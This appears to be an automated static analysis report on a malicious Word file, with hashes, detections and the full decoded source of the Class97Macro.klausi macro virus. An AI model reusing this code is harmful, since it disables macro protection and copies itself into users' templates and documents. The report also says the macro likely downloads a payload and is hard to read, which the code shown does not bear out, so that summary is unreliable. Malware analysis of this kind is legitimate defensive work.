Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 013a79354776ef63…

MALICIOUS

Office (OLE)

Size: 27.5 KB
Created: 2000-01-31 01:36:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 20e91791cefb65edea579c06109ea160
SHA-1: 16fa7197bb7b02a563e0a5ef94d3cc0a60b74509
SHA-256: 013a79354776ef63de5c9837baa97437f12536cabac932a23a5065be9ffc3f28
Risk Score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The file contains a VBA macro that is triggered by the Document_Open event. This macro appears to obfuscate its code and inject it into the document's normal template or active document. The macro's authoring metadata and the ClamAV detection name 'Doc.Trojan.Liar-4' suggest malicious intent, likely to download and execute a secondary payload. The macro's code is heavily obfuscated, making it difficult to determine the exact payload or destination.

Heuristics (3)

  • ClamAV: Doc.Trojan.Liar-4 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Liar-4
  • VBA macros detected [medium] (OLE_VBA_MACROS), 1 related finding
    Document contains VBA macro code
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1739 bytes
SHA-256: fcfc5ac7e449d68101898353a0d05b7f9f042bbc294e602d7f5131f6f4d6ee39
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Rem Name:   Class97Macro.klausi
Rem Author: inspector klausi
Rem Date:   August 1999
--------------------------->


Private Sub DOCUMenT_OPEN() '
Dim v(175): Options.VirusProtection = (Rnd * 0): Options.SaveNormalPrompt = (Rnd * 0) '
Set A = MacroContainer.VBProject: Set Ab = A.VBcOmponEnts(1) '
Set ABc = Ab.coDEMoDUle: Set S = NormalTemplate: T = Chr(39) '
If MacroContainer = S Then Set S = ActiveDocument '
Set NH = S.VBProject.VBcOmponEnts(1).coDEMoDUle: Li = ABc.cOUntofliNEs: Y = 100 + Int(Rnd * 50) '
For i = 1 To Li: jc = "": d = Int(Rnd * 3): P = InStr(ABc.LInES(i, 1), T) '
If P = 1 And Li > Y Then '
d = 1: GoTo N_ '
End If '
l = UCase(Left(ABc.LInES(i, 1), (P - 1))) '
For O = 1 To Len(l): F = Mid(l, O, 1) '
If Asc(F) < 90 And Asc(F) > 65 Then F = Chr(Asc(F) + Int(Rnd * 2) * 32) '
v(i) = v(i) & F: Next O '
For J = 1 To Int(75 - (Rnd * 20)): jc = jc & Chr(255 - Int(Rnd * 100)): Next J '
v(i) = v(i) & T & jc '
If d = 2 Then v(i) = v(i) & vbCr & T & jc '
vc = vc & v(i) & vbCr '
N_: '
Next i '
If NH.cOUntofliNEs < (1 + 1 + 2) Then '
NH.dELeTelINES 1, NH.cOUntofliNEs: NH.AdDFrOMSTRiNg vc: NH.dELeTelINES NH.cOUntofliNEs, 1 '
With Dialogs(wdDialogFileSummaryInfo): .Author = "INsPECtor klAUsI": .Title = "INfEcted wItH clAss97MAcRo.kLAuSi": .Execute: End With '
If ActiveDocument.Saved = (Rnd * 0) Then ActiveDocument.SaveAs ActiveDocument.FullName '
End If '
End Sub '
Rem cODed by iNspector kLAUSi '